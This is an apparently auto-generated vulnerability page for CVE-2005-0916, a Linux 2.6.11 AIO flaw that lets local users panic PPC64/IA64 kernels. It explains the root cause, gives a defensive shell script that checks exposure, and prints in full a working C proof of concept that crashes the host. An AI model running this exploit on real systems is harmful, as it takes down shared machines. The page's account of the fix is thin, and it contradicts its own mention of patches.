CVE-2005-0916
Description
AIO in the Linux kernel 2.6.11 on the PPC64 or IA64 architectures with CONFIG_HUGETLB_PAGE enabled allows local users to cause a denial of service (system panic) via a process that executes the io_queue_init function but exits without running io_queue_release, which causes exit_aio and is_hugepage_only_range to fail.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
Patches (2)
Vulnerability mechanics
Root cause
Not a race in the usual sense: a process that creates an AIO context with `io_queue_init` and then exits without calling `io_queue_release` leaves that context for the kernel to destroy on its behalf. The exit path, `exit_aio`, does that teardown, and on PPC64 and IA64 kernels built with CONFIG_HUGETLB_PAGE it reaches `is_hugepage_only_range`, which fails in that context and panics the system. No timing window is needed; simply exiting with an unreleased context is enough.
Attack vector
A local, unprivileged user can panic the kernel through the AIO subsystem. The trigger is a process that creates an AIO context with `io_queue_init` (the libaio wrapper around the `io_setup` system call) and then terminates without calling `io_queue_release`. The kernel's exit path, `exit_aio`, then has to tear down the abandoned context itself, and on PPC64 or IA64 with CONFIG_HUGETLB_PAGE enabled that cleanup calls `is_hugepage_only_range`, which fails and brings the system down [ref_id=1]. Nothing beyond the ability to run a program and create a file is required, and the exit may be a normal return from main, a crash, or a kill, since `exit_aio` runs in every case.
Affected code
The vulnerable path runs through the kernel's AIO (Asynchronous I/O) subsystem (`fs/aio.c`) together with the architecture-specific `is_hugepage_only_range` implementations that PPC64 and IA64 compile in when CONFIG_HUGETLB_PAGE is set. The fault is not in `io_queue_init` itself: contexts that are explicitly released with `io_queue_release` are fine. It is the exit-time cleanup, `exit_aio`, that fails when it destroys a context the dying process never released [ref_id=1].
What the fix does
The provided bundle does not contain a patch or specific details on how the vulnerability is fixed. The advisory only establishes that the issue lies in the AIO subsystem's handling of a context that was created with `io_queue_init` and never released with `io_queue_release` [ref_id=1]. Remediation would therefore have to make the kernel's exit-time cleanup of AIO contexts safe on PPC64 and IA64 even when the owning process never released them. Two caveats follow from the preconditions: a user-space rule of always calling `io_queue_release` is not a mitigation, because a process that crashes or is killed never reaches it and `exit_aio` runs regardless; and until a fixed kernel is installed, the only configuration-level mitigation the advisory supports is running a kernel built without CONFIG_HUGETLB_PAGE.
Preconditions
- config: The system must be running Linux kernel 2.6.11 on the PPC64 or IA64 architecture.
- config: The CONFIG_HUGETLB_PAGE kernel configuration option must be enabled.
- auth: The attacker must have local user access to the system.
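The three preconditions above can be checked mechanically before deciding whether a host needs attention. The script below is an added example written for this page, not part of the advisory or of any distribution's tooling; the function and sample-config names are its own, and it assumes the running kernel's config is readable from /boot/config-$(uname -r) or /proc/config.gz. Point releases 2.6.11.x and distribution builds such as 2.6.11-<tag> are reported as exposed because the advisory names 2.6.11 without saying which point release, if any, carries the fix.

```shell
#!/bin/sh
# Added example: preconditions check for CVE-2005-0916 (not part of the advisory
# or of any vendor tool). Reports whether a host matches all three advisory
# preconditions: kernel 2.6.11, PPC64 or IA64, CONFIG_HUGETLB_PAGE=y.

# cve_2005_0916_exposed RELEASE MACHINE CONFIG_TEXT
#   RELEASE     output of `uname -r`
#   MACHINE     output of `uname -m`
#   CONFIG_TEXT contents of the kernel .config
# Returns 0 when every precondition holds, 1 otherwise.
cve_2005_0916_exposed() {
    release=$1
    machine=$2
    config=$3

    # Kernel version: 2.6.11, a 2.6.11.x point release, or a distro build
    # such as 2.6.11-1.1369_FC4. Anything else (2.6.10, 2.6.12, ...) is out.
    case "$release" in
        2.6.11|2.6.11.*|2.6.11-*) ;;
        *) return 1 ;;
    esac

    # Architecture: the advisory names only PPC64 and IA64.
    case "$machine" in
        ppc64|ia64) ;;
        *) return 1 ;;
    esac

    # Kernel config: the option must be built in; "# CONFIG_HUGETLB_PAGE is not set"
    # does not match the anchored pattern.
    printf '%s\n' "$config" | grep -q '^CONFIG_HUGETLB_PAGE=y$' || return 1
    return 0
}

# Read the running kernel's config from the usual locations (empty if unavailable).
live_kernel_config() {
    if [ -r "/boot/config-$(uname -r)" ]; then
        cat "/boot/config-$(uname -r)"
    elif [ -r /proc/config.gz ]; then
        zcat /proc/config.gz
    fi
}

# Convenience wrapper for the live host; prints a verdict and returns 0 if exposed.
check_live_host() {
    if cve_2005_0916_exposed "$(uname -r)" "$(uname -m)" "$(live_kernel_config)"; then
        echo "EXPOSED: kernel $(uname -r) on $(uname -m) with CONFIG_HUGETLB_PAGE=y"
        return 0
    fi
    echo "not exposed: kernel $(uname -r) on $(uname -m)"
    return 1
}

# Constructed sample configs (not taken from any real system) for offline use.
SAMPLE_CONFIG_HUGETLB='CONFIG_PPC64=y
CONFIG_HUGETLB_PAGE=y
CONFIG_HUGETLBFS=y'
SAMPLE_CONFIG_NO_HUGETLB='CONFIG_PPC64=y
# CONFIG_HUGETLB_PAGE is not set'

# Usage on a live host:  . ./cve_2005_0916_check.sh && check_live_host
```

The version match is deliberately conservative: a host that reports 2.6.11.x is flagged and left to the operator to confirm against the distribution's changelog, rather than silently cleared. Run `check_live_host` from a sourced copy of the script; the exit status (0 = exposed) is suitable for fleet-wide scripting.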
Reproduction
```c
/*
 * Proof of concept as published (milw0rm.com, 2005-04-04), reflowed from the
 * page's collapsed listing. It creates an AIO context with io_queue_init(),
 * performs one direct-I/O read, and deliberately returns from main() without
 * io_queue_release(), so the kernel's exit_aio() has to tear the context down.
 * On a 2.6.11 PPC64/IA64 kernel with CONFIG_HUGETLB_PAGE that path panics.
 *
 * Build (needs the libaio headers and library): gcc -o aio_exit aio_exit.c -laio
 * Only run this on a disposable test machine: a successful run panics the host.
 */
#define _XOPEN_SOURCE 600
#define _GNU_SOURCE

#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/fcntl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <libaio.h>

int pagesize;
char *iobuf;
io_context_t myctx;
int aio_maxio = 4;

/*
 * Submit a single AIO direct-I/O read and wait for its completion event.
 * Returns the number of events reaped (1 on success) or a negative errno.
 */
int do_aio_direct_read(int fd, char *iobuf, int offset, int size)
{
	struct iocb myiocb;
	struct iocb *iocbp = &myiocb;
	struct io_event e;
	int ret;

	io_prep_pread(&myiocb, fd, iobuf, size, offset);
	/* io_submit() returns the number of iocbs queued, or -errno */
	if ((ret = io_submit(myctx, 1, &iocbp)) != 1) {
		fprintf(stderr, "io_submit: %s\n", strerror(-ret));
		return ret;
	}

	/* NULL timeout: block until the single completion event arrives */
	ret = io_getevents(myctx, 1, 1, &e, NULL);

	if (ret > 0) {
		struct iocb *iocb = e.obj;
		int iosize = iocb->u.c.nbytes;
		long long loffset = iocb->u.c.offset;

		printf("AIO read of %d at offset %lld returned %ld\n",
		       iosize, loffset, (long)e.res);
	}

	return ret;
}

int main(int argc, char *argv[])
{
	const char *filename = "test.aio.file";
	int fd;
	int err;

	fd = open(filename, O_RDWR | O_DIRECT | O_CREAT | O_TRUNC, 0666);
	if (fd < 0) {
		perror("open");
		exit(1);
	}

	/* O_DIRECT needs a page-aligned buffer of a page-multiple size */
	pagesize = getpagesize();
	err = posix_memalign((void **)&iobuf, pagesize, pagesize);
	if (err) {
		fprintf(stderr, "Error allocating %d aligned bytes.\n", pagesize);
		exit(1);
	}
	err = write(fd, iobuf, pagesize);
	if (err != pagesize) {
		fprintf(stderr, "Error ret = %d writing %d bytes.\n", err, pagesize);
		perror("");
		exit(1);
	}

	/* io_queue_init() wraps io_setup(): this creates the kernel AIO context */
	memset(&myctx, 0, sizeof(myctx));
	err = io_queue_init(aio_maxio, &myctx);
	if (err) {
		fprintf(stderr, "io_queue_init: %s\n", strerror(-err));
		exit(1);
	}
	err = do_aio_direct_read(fd, iobuf, 0, pagesize);
	close(fd);

	/*
	 * Intentionally no io_queue_release(myctx): the context is left for
	 * exit_aio() to destroy when the process exits, which is the trigger.
	 */
	printf("This will panic on ppc64\n");
	return err;
}
/* milw0rm.com [2005-04-04] */
```
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References